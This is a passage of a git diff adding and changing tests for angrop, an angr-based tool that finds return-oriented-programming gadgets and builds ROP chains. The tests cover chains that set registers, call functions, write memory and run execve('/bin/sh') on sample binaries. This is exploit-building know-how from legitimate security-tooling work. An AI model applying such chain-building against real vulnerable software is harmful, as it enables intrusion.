0x4 assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 
assert len(gadget.sp_reg_controllers) == 0 + chain = rop.pivot(0x600000) + assert chain + proj = angr.Project(os.path.join(BIN_DIR, "tests", "i386", "bronze_ropchain"), auto_load_libs=False) rop = proj.analyses.ROP() @@ -129,6 +133,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x80488e8) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x8 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'ebp' @@ -150,6 +155,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x8048998) assert type(gadget) == PivotGadget assert gadget.stack_change == 0xc + assert gadget.stack_change_before_pivot == 0xc assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop().startswith('symbolic_stack_') @@ -160,6 +166,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x8048fd6) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'eax' @@ -174,6 +181,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x8052cac) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x14 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'ebp' @@ -200,6 +208,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x4c7b5a+1) assert type(gadget) == PivotGadget assert gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x24 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'r7' @@ -215,6 +224,7 @@ def test_pivot_gadget(): gadget = rop.analyze_gadget(0x1040c) assert type(gadget) == PivotGadget assert 
gadget.stack_change == 0 + assert gadget.stack_change_before_pivot == 0 assert gadget.stack_change_after_pivot == 0x4 assert len(gadget.sp_controllers) == 1 and gadget.sp_controllers.pop() == 'r11' @@ -269,7 +279,7 @@ def test_syscall_gadget(): assert type(gadget) == SyscallGadget assert gadget.stack_change == 0 assert not gadget.can_return - assert len(gadget.concrete_regs) == 1 and gadget.concrete_regs.pop('rax') == 0x3b + assert len(gadget.prologue.concrete_regs) == 1 and gadget.prologue.concrete_regs.pop('rax') == 0x3b gadget = rop.analyze_gadget(0x521cef) assert type(gadget) == RopGadget @@ -283,13 +293,13 @@ def test_syscall_gadget(): assert type(gadget) == SyscallGadget assert gadget.stack_change == 0 assert not gadget.can_return - assert len(gadget.concrete_regs) == 1 and gadget.concrete_regs.pop('rax') == 0x3b + assert len(gadget.prologue.concrete_regs) == 1 and gadget.prologue.concrete_regs.pop('rax') == 0x3b gadget = rop.analyze_gadget(0x536715) assert type(gadget) == SyscallGadget assert gadget.stack_change == 0 assert not gadget.can_return - assert len(gadget.concrete_regs) == 1 and gadget.concrete_regs.pop('rsi') == 0x81 + assert len(gadget.prologue.concrete_regs) == 1 and gadget.prologue.concrete_regs.pop('rsi') == 0x81 proj = angr.Project(os.path.join(BIN_DIR, "tests", "cgc", "sc1_0b32aa01_01"), auto_load_libs=False) rop = proj.analyses.ROP() @@ -310,10 +320,187 @@ def test_pop_pc_gadget(): assert gadget.pc_offset == 0 assert gadget.stack_change == 0x18 +def test_reg_moves(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "arjsfxjr"), auto_load_libs=False) + rop = proj.analyses.ROP() + gadget = rop.analyze_gadget(0x4027c4) # mov esi, esi; mov edi, r15d; call qword ptr [r12 + rbx*8] + assert len(gadget.reg_moves) == 1 + + proj = angr.Project(os.path.join(BIN_DIR, "tests", "aarch64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=True, only_check_near_rets=False) + g = rop.analyze_gadget(0x4ebad4) + assert 
len(g.reg_moves) == 1 + +def test_oop_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "i386", "bronze_ropchain"), auto_load_libs=False) + rop = proj.analyses.ROP() + + for addr in [0x0806b397, 0x0806b395, 0x08091dd2, 0x08091f5a]: + g = rop.analyze_gadget(addr) + assert g and g.oop + +def test_negative_stack_change(): + # pylint: disable=pointless-string-statement + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + + # this is not a gadget because it is loading uninitialized memory + """ + sub sp, #0x50 + add fp, pc + b #0x4bf669 + ldr r3, [sp, #8] + mov r2, r7 + mov r1, r6 + mov r0, r5 + str r3, [sp] + mov r3, r8 + blx r4 + """ + g = rop.analyze_gadget(0x4bf661) + assert g is None + +def test_arm_jmp_mem(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel", "libc-2.31.so"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, is_thumb=True) + g = rop.analyze_gadget(0x456951) + assert g is None + +def test_num_mem_access(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "cgc", "sc1_0b32aa01_01"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, max_sym_mem_access=2) + + g = rop.analyze_gadget(0x8048500) + assert g is not None + assert g.has_symbolic_access() is True + assert g.num_sym_mem_access == 2 + assert len(g.mem_changes) == 2 + +def test_pac(): + # pylint: disable=pointless-string-statement + """ + add sp, sp, #0xc0 + autiasp + ret + """ + proj = angr.load_shellcode( + b'\xffC\x01\x91\xbf#\x03\xd5\xc0\x03_\xd6', + "aarch64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + assert len(rop._all_gadgets) == 1 + +def test_riscv(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", 
"riscv", "abgate-libabGateQt.so"), + load_options={'main_opts':{'base_addr': 0}}, + ) + rop = proj.analyses.ROP(fast_mode=False, cond_br=True, max_bb_cnt=5) + gs = rop.analyze_addr(0x5f7a) + g = gs[0] + assert 's0' in g.popped_regs + +def test_out_of_patch(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + # 0x000000000007c950 : mov rax, qword ptr [rip + 0x342849] ; ret + g = rop.analyze_gadget(0x000000000047c950) + assert g.oop is False + +def test_controller(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/datadep_test"), auto_load_libs=False) + rop = proj.analyses.ROP() + g = rop.analyze_gadget(0x400614) + + assert 'rax' in g.reg_controllers + s = g.reg_controllers['rax'] + assert len(s) == 1 and 'rax' in s + + assert 'rbx' in g.reg_controllers + s = g.reg_controllers['rbx'] + assert len(s) == 2 and 'rbx' in s and 'rsi' in s + + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel/manysum"), auto_load_libs=False) + rop = proj.analyses.ROP() + + g = rop.analyze_gadget(0x10558) + assert not g.reg_controllers + +def test_cdq(): + proj = angr.load_shellcode( + """ + pop rax + cdq + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert g is not None + assert 'rax' in g.popped_regs + assert 'rdx' not in g.popped_regs + +def test_invalid_ptr(): + proj = angr.load_shellcode( + """ + pop rcx; xor al, 0x52; movabs byte ptr [0xc997d3941b683390], al; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + g = rop.analyze_gadget(0x400000) + assert g is None + +def test_cond_br_guard_pop_conflict(): + proj = angr.load_shellcode( + """ + ldr x3, [sp, #0x10]; + mov x15, x3; + add x3, x3, #2; + str x3, [sp, #0x10]; + ldr x24, [sp, #0x18]; + cmp x15, x24; + b.eq 
#0x24; + str x1, [x0]; + str x1, [x1]; + mov x0, #1; + ldr x30, [sp, #0x28]; + add sp, sp, #0x30; + ret + """, + "aarch64", + load_address=0, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + gs = rop.analyze_addr(0) + assert len(gs) == 1 + g = gs[0] + assert not g.reg_pops + +def test_riscv_zero_register(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", + "borgbackup2-chunker.cpython-312-riscv64-linux-gnu.so"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_bb_cnt=5, cond_br=True) + + gs = rop.analyze_addr(0x0000000000011f32) + assert len(gs) == 1 + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} for f in sorted(all_functions.keys()): + print(f) if hasattr(all_functions[f], '__call__'): all_functions[f]() diff --git a/tests/test_performance.py b/tests/test_performance.py new file mode 100644 index 00000000..ac3fbbaf --- /dev/null +++ b/tests/test_performance.py @@ -0,0 +1,105 @@ +import os +import time +import logging + +import angr +import angrop # pylint: disable=unused-import + +logging.getLogger("cle").setLevel("ERROR") + +BIN_DIR = os.path.join(os.path.dirname(__file__), "..", "..", "binaries") +CACHE_DIR = os.path.join(BIN_DIR, 'tests_data', 'angrop_gadgets_cache') + +def local_gadget_finding(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "armel/libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 20 + + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 5 + + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP() + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 35 + + start = time.time() + rop.optimize(processes=16) + 
assert time.time() - start < 5 + +def local_graph_optimization_missing_write(): + """ + this binary does not contain enough gadgets to form a write chain + """ + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/manywords"), auto_load_libs=False) + rop = proj.analyses.ROP() + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 5 + + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 1 + +def local_graph_optimization(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/ALLSTAR_389-dsgw_csearch"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False) + + start = time.time() + rop.find_gadgets(processes=16, optimize=False) + assert time.time() - start < 15 + + # this is about 25-26s + start = time.time() + rop.optimize(processes=16) + assert time.time() - start < 35 + +def local_write_optimize(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64/ALLSTAR_389-dsgw_csearch"), auto_load_libs=False) + rop = proj.analyses.ROP() + + cache = '/tmp/ALLSTAR_389-dsgw_csearch.cache' + if os.path.exists(cache): + rop.load_gadgets(cache, optimize=False) + else: + rop.find_gadgets(processes=16, show_progress=True, optimize=False) + rop.save_gadgets(cache) + + start = time.time() + for _ in range(20): + rop.write_to_mem(0x41414141, b'AAAAAAA') + print(time.time() - start) + +def run_all(): + functions = globals() + all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} + for f in sorted(all_functions.keys()): + print(f) + if hasattr(all_functions[f], '__call__'): + all_functions[f]() + print("local_gadget_finding") + local_gadget_finding() + print("local_graph_optimization_missing_write") + local_graph_optimization_missing_write() + print("local_graph_optimization") + local_graph_optimization() + print("local_write_optimize") + local_write_optimize() + +if __name__ == "__main__": + import sys + + 
logging.getLogger("angrop.rop").setLevel(logging.DEBUG) + #logging.getLogger("angrop.gadget_analyzer").setLevel(logging.DEBUG) + + if len(sys.argv) > 1: + globals()['test_' + sys.argv[1]]() + else: + run_all() diff --git a/tests/test_rop.py b/tests/test_rop.py index 7ab88ba4..aa4304f8 100644 --- a/tests/test_rop.py +++ b/tests/test_rop.py @@ -90,10 +90,9 @@ def compare_gadgets(test_gadgets, known_gadgets): for test_gadget in test_gadget_dict[g.addr] if test_gadget.bbl_addrs == g.bbl_addrs ] - assert len(matching_gadgets) == 1 + assert len(matching_gadgets) == 1, matching_gadgets assert_gadgets_equal(g, matching_gadgets[0]) - def execute_chain(project, chain): s = project.factory.blank_state() s.memory.store(s.regs.sp, chain.payload_str()) @@ -244,12 +243,18 @@ def test_roptest_x86_64(): verify_execve_chain(c) def test_roptest_aarch64(): + # pylint: disable=pointless-string-statement cache_path = os.path.join(test_data_location, "aarch64_glibc_2.19") proj = angr.Project(os.path.join(public_bin_location, "aarch64", "libc.so.6"), auto_load_libs=False) rop = proj.analyses.ROP(fast_mode=True, only_check_near_rets=False) + """ + 0x4b7ca8: ldp x19, x30, [sp]; add sp, sp, #0x20; ret + 0x4ebad4: add x0, x19, #0x260; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret + """ rop.analyze_gadget(0x4b7ca8) rop.analyze_gadget(0x4ebad4) + rop.chain_builder.optimize() data = claripy.BVS("data", 64) chain = rop.set_regs(x0=data) @@ -269,6 +274,55 @@ def test_roptest_aarch64(): chain = rop.execve(path=b'/bin/sh') verify_execve_chain(chain) +def test_acct_sa(): + """ + just a system test + """ + proj = angr.Project(os.path.join(public_bin_location, "x86_64", "ALLSTAR_acct_sa"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + cache_path = os.path.join(test_data_location, "ALLSTAR_acct_sa") + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path) + else: + rop.find_gadgets() + rop.save_gadgets(cache_path) + + chain = 
rop.set_regs(rax=0x41414141) + assert chain is not None + state = chain.exec() + assert state.regs.rax.concrete_value == 0x41414141 + + chain = rop.func_call(0xdeadbeef, [0x41414141, 0x42424242, 0x43434343]) + assert chain is not None + state = chain.concrete_exec_til_addr(0xdeadbeef) + assert state.regs.rdi.concrete_value == 0x41414141 + assert state.regs.rsi.concrete_value == 0x42424242 + assert state.regs.rdx.concrete_value == 0x43434343 + +def test_liblog(): + """ + yet another system test + the difficulty here is that it needs to be able to normalize a jmp_mem gadget that requries moves + """ + proj = angr.Project(os.path.join(public_bin_location, "x86_64", + "ALLSTAR_android-libzipfile-dev_liblog.so.0.21.0"), + auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + cache_path = os.path.join(test_data_location, "ALLSTAR_liblog") + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path) + else: + rop.find_gadgets() + rop.save_gadgets(cache_path) + + chain = rop.set_regs(rdx=0x41414141) + assert chain is not None + + chain = rop.func_call(0xdeadbeef, [0x41414141, 0x42424242, 0x43434343]) + assert chain is not None + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')} diff --git a/tests/test_ropblock.py b/tests/test_ropblock.py index e4c5d7c1..76be1e65 100644 --- a/tests/test_ropblock.py +++ b/tests/test_ropblock.py @@ -43,6 +43,127 @@ def test_reg_mover(): except RopException: pass +def test_expand_ropblock(): + proj = angr.load_shellcode( + """ + pop rdi; ret + mov eax, edi; ret + pop rbx; ret + add rsp, 8; ret + mov rdx, rax; mov esi, 1; call rbx + pop rsi; ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rsi=0x42424242, rdx=0x43434343) + assert chain is not None + +def 
test_block_effect(): + proj = angr.load_shellcode( + """ + pop rax + pop rbx + ret + """, + "amd64", + load_address=0x400000, + auto_load_libs=False, + ) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.find_gadgets_single_threaded(show_progress=False) + + chain = rop.set_regs(rax=0x41414141) + rb = RopBlock.from_chain(chain) + data = rb._values[2].ast + rb._blank_state.solver.add(data == 0x42424242) + rb._analyze_effect() + assert not rb.popped_regs + +def test_normalized_block_effect(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "x86_64", "libc.so.6"), auto_load_libs=False) + rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False) + rop.analyze_gadget(0x536408) #: mov r8, r14; mov rsi, r15; call qword ptr [r12 + 0xf0] + rop.analyze_gadget(0x41f668) #: pop r12; ret + rop.analyze_gadget(0x0000000000401b96) # pop rdx; ret + rop.analyze_gadget(0x0000000000422b5a) # pop rdi; ret + rop.analyze_gadget(0x000000000043cdc9) # mov qword ptr [rdi + 8], rdx; ret + rop.chain_builder.optimize() + + chain = rop.move_regs(r8='r14', rsi='r15') + assert chain is not None + +def test_stack_offset_infinite_loop(): + cache_path = os.path.join(CACHE_DIR, "libdevel-leak-perl-Leak.so") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "libdevel-leak-perl-Leak.so"), + auto_load_libs=False, load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, + only_check_near_rets=False, cond_br=True, max_bb_cnt=5) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(optimize=False) + rop.save_gadgets(cache_path) + + addrs = [g.addr for g in rop._all_gadgets] + assert 0xf30 in addrs + + # if stack_offset is not properly calculated, it may lead to infinite loops + # when handling 0xf30 + rop.optimize() + +def test_normalized_block_effect2(): + cache_path = os.path.join(CACHE_DIR, "riscv_autotalent-autotalent.so") + proj = 
angr.Project(os.path.join(BIN_DIR, "tests", "riscv", "autotalent-autotalent.so"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, + only_check_near_rets=False, cond_br=True, max_bb_cnt=5) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(processes=16, optimize=False) + rop.save_gadgets(cache_path) + + gs = rop.analyze_addr(0x4ae6) + g = gs[0] + rb = rop.chain_builder._reg_setter.normalize_gadget(g) + assert 'a0' not in rb.popped_regs + +def test_normalized_block_with_conditional_branch(): + proj = angr.Project(os.path.join(BIN_DIR, "tests", "aarch64", + "libastring-ocaml-astring.cmxs"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, + only_check_near_rets=False, cond_br=True, max_bb_cnt=5) + + rop.analyze_addr(0x0000000000023d28) + rop.analyze_addr(0x00000000000189a4) + rop.analyze_addr(0x0000000000020880) + + rop.chain_builder.optimize() + chain = rop.set_regs(x0=0x41414141, x5=0x42424242) + assert chain is not None + +def test_jmp_reg_normalize_fast_path(): + cache_path = os.path.join(CACHE_DIR, "mipsel_btrfs-tools_btrfs-calc-size") + proj = angr.Project(os.path.join(BIN_DIR, "tests", "mipsel", "btrfs-tools_btrfs-calc-size"), + load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1) + + if os.path.exists(cache_path): + rop.load_gadgets(cache_path, optimize=False) + else: + rop.find_gadgets(processes=16, optimize=False) + rop.save_gadgets(cache_path) + + rop.optimize(processes=1) + def run_all(): functions = globals() all_functions = {x:y for x, y in functions.items() if x.startswith('test_')}